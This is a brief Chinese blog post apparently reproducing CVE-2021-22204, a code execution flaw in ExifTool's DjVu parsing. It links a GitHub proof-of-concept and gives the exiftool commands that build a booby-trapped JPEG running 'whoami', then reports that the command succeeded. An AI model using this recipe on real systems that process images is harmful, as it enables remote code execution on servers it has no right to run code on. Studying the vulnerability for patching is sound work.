CVE-2021-22204:ExifTool任意代码执行

CVE-2021-22204 ExifTool任意代码执行

github poc下载

https://github.com/OneSecCyber/JPEG_RCE

ExifTool 7.44至12.23在DjVu模块中存在一个错误,该错误允许在解析恶意图像时执行任意代码

meta-data为MIME Type : image/jpeg"即jpg图片可以达成RCE

exiftool -config eval.config mojave.jpg -eval='system("whoami")'

exiftool mojave.jpg

image-20210518104849829

可以看到成功执行了命令

posted @ 2021-05-18 11:56  LEOGG  阅读(1308)  评论(0编辑  收藏  举报